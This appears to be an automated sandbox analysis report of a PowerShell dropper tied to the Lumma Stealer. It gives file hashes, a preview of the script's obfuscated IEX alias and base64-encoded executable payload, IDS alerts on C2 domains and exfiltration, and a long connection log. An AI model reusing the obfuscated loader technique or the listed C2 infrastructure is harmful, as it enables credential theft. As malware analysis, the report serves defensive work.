| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 6221 |
| Entropy (8bit): | 3.7221094830592123 |
| Encrypted: | false |
| SSDEEP: | 96:+nlQf33CxH5CkvhkvCCtClLv0IjHvlLv0IKHv:+lQfyZeqTLTW |
| MD5: | 4944A55015B1938A53F5C0B46FCCC212 |
| SHA1: | 525584A334359891021CBCF2EFBD9DBACC3F2A4C |
| SHA-256: | EC6F30A0A1FD6B391B1EA4291D536D157F542D655ECBE46DDEEF4ED386DFB708 |
| SHA-512: | 70A1FF38D9B4CAAA90F1712596FF1293FD87686414B3414FFE25083B8BBC6300F9D26416B2B5E70BEBC28B02169A6E85FD5AC5980D55D8CD7FF023BA785CD356 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X6MBSE624Q4SSGMC0VO5.temp
Download File
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 6221 |
| Entropy (8bit): | 3.7221094830592123 |
| Encrypted: | false |
| SSDEEP: | 96:+nlQf33CxH5CkvhkvCCtClLv0IjHvlLv0IKHv:+lQfyZeqTLTW |
| MD5: | 4944A55015B1938A53F5C0B46FCCC212 |
| SHA1: | 525584A334359891021CBCF2EFBD9DBACC3F2A4C |
| SHA-256: | EC6F30A0A1FD6B391B1EA4291D536D157F542D655ECBE46DDEEF4ED386DFB708 |
| SHA-512: | 70A1FF38D9B4CAAA90F1712596FF1293FD87686414B3414FFE25083B8BBC6300F9D26416B2B5E70BEBC28B02169A6E85FD5AC5980D55D8CD7FF023BA785CD356 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1835008 |
| Entropy (8bit): | 4.466284072855703 |
| Encrypted: | false |
| SSDEEP: | 6144:dIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSb+:OXD94zWlLZMM6YFHc++ |
| MD5: | B70688E6E3A66AA5D92F25B014454752 |
| SHA1: | 7ACE154329D77ED08FFC44CA8991EBC2E2B3F4AC |
| SHA-256: | AA02BFD6C47709F9FA04B627B0076FD37232F0D85E60294A853FE3F6A3A48AF8 |
| SHA-512: | DB367B102CC19ED7E56420B0FDBCFA0F946BF92ABCB79381B860E8D82D1268442C4D57CE1C3F5161FF5DACEFBF87B93C4FC2AB0299DE85CA0C5E2FF28A60EDDB |
| Malicious: | false |
| Preview: |
| File type: | |
| Entropy (8bit): | 5.485201881959517 |
| TrID: | |
| File name: | 92.255.57_2.112.ps1 |
| File size: | 539'177 bytes |
| MD5: | be4f493e0b615fa9df3216132c14f763 |
| SHA1: | dfda3628a9b8971a043fafab4c6ee95c8b4cd5cc |
| SHA256: | 229385fbe03dd8ab9489ee1f0f4a5916b89be800aa27b7d563b63080211235a9 |
| SHA512: | 4f69d6de21d1de46778437be2f42bbea0a92ce889091b99eb37be280dae80d410f3d69c4018dccf3398b90dd50809b4aa92767e173f0e7aace13531feceac9ac |
| SSDEEP: | 12288:cG34WzRsAX2h7dVI42CoeUJ2z6m20sFqwg2:cGdyZPIvLJ2z20sFFg2 |
| TLSH: | B4B47D3140533C5E3F6E2ECAA4006DC00C9D39A7BA14D154AEC992B6B2BD53B5E6D9FC |
| File Content Preview: | .. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIp2gmcAAAAAAA |
 | |
| Icon Hash: | 3270d6baae77db44 |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:11.805855+0100 | 2059189 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) | 1 | 192.168.2.4 | 58984 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T08:27:11.817677+0100 | 2059211 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) | 1 | 192.168.2.4 | 60549 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T08:27:11.830325+0100 | 2059201 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) | 1 | 192.168.2.4 | 56901 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T08:27:11.848565+0100 | 2059203 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) | 1 | 192.168.2.4 | 60048 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T08:27:11.877255+0100 | 2059199 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) | 1 | 192.168.2.4 | 64720 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T08:27:11.893391+0100 | 2059207 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) | 1 | 192.168.2.4 | 60715 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T08:27:11.905812+0100 | 2059209 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) | 1 | 192.168.2.4 | 54093 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T08:27:11.927906+0100 | 2059191 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) | 1 | 192.168.2.4 | 53855 | 1.1.1.1 | 53 | UDP |
| 2025-01-14T08:27:12.602411+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
| 2025-01-14T08:27:13.109424+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
| 2025-01-14T08:27:13.819855+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:14.261530+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:14.261530+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:14.743708+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:15.093246+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:15.093246+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:15.727636+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:17.659036+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:18.480783+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:19.021812+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:20.289084+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:22.160237+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:24.845892+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:25.345878+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 14, 2025 08:27:11.957742929 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:11.957803965 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:11.957885981 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:11.962060928 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:11.962097883 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:12.602304935 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:12.602411032 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:12.606659889 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:12.606687069 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:12.607043028 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:12.654783964 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:12.656572104 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:12.699340105 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.109472036 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.109503984 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.109544992 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.109569073 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.109574080 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:13.109597921 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.109611034 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.109620094 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:13.109627008 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:13.109668016 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:13.199007034 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.199038029 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.199237108 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:13.199273109 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.203835964 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.203943014 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.203947067 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:13.206785917 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:13.316840887 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:13.316906929 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.316922903 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Jan 14, 2025 08:27:13.316930056 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.336785078 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:13.336812973 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.336908102 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:13.337241888 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:13.337256908 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.819782019 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.819854975 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:13.821949005 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:13.821974993 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.822283983 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:13.823714018 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:13.823714018 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:13.823822975 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.261548996 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.261674881 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.261725903 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.262547970 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.262569904 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.262583971 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.262588978 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.271222115 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.271271944 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.271351099 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.271692991 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.271706104 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.743582010 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.743707895 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.745166063 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.745176077 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.745490074 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:14.758286953 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.758315086 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:14.758388996 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093241930 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093332052 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093385935 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.093405008 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093419075 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093460083 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.093508005 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093589067 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093626976 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.093633890 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093688965 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093725920 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.093730927 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093800068 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.093836069 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.093842030 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.139151096 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.139183998 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.182701111 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.182786942 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.182804108 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.182965040 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.183028936 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.183036089 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.183130026 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.183185101 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.183260918 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.183278084 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.183293104 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.183300018 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.259371996 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.259443045 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.259522915 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.259901047 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.259915113 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.727472067 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.727636099 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.931159973 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.931222916 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.931700945 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.935005903 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.935162067 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.935195923 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:15.935256004 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:15.935267925 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:17.163667917 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:17.163770914 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:17.163899899 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:17.164046049 CET | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:17.164076090 CET | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:17.182648897 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:17.182696104 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:17.182790041 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:17.183168888 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:17.183178902 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:17.658905029 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:17.659035921 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:17.660507917 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:17.660521984 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:17.660743952 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:17.668788910 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:17.668927908 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:17.668943882 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:18.480849981 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:18.481098890 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:18.481194973 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:18.481254101 CET | 49740 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:18.481276989 CET | 443 | 49740 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:18.556162119 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:18.556216955 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:18.556282997 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:18.556704998 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:18.556725979 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.021635056 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.021811962 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.023178101 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.023204088 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.023607969 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.024904013 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.025190115 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.025233030 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.025324106 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.025336027 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.638278961 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.638382912 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.638552904 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.638761997 CET | 49741 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.638780117 CET | 443 | 49741 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.818252087 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.818305016 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:19.818382025 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.818726063 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:19.818738937 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:20.288928032 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:20.289083958 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:20.290602922 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:20.290622950 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:20.290887117 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:20.292576075 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:20.292689085 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:20.292700052 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:21.333800077 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:21.333913088 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:21.334022999 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:21.334233046 CET | 49743 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:21.334259033 CET | 443 | 49743 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:21.681433916 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:21.681528091 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:21.681701899 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:21.681955099 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:21.681972027 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:22.160110950 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:22.160237074 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:22.162250996 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:22.162266970 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:22.162581921 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:22.164169073 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:22.164400101 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
| Jan 14, 2025 08:27:22.164428949 CET | 443 | 49745 | 188.114.96.3 | 192.168.2.4 |
| Jan 14, 2025 08:27:22.164531946 CET | 49745 | 443 | 192.168.2.4 | 188.114.96.3 |
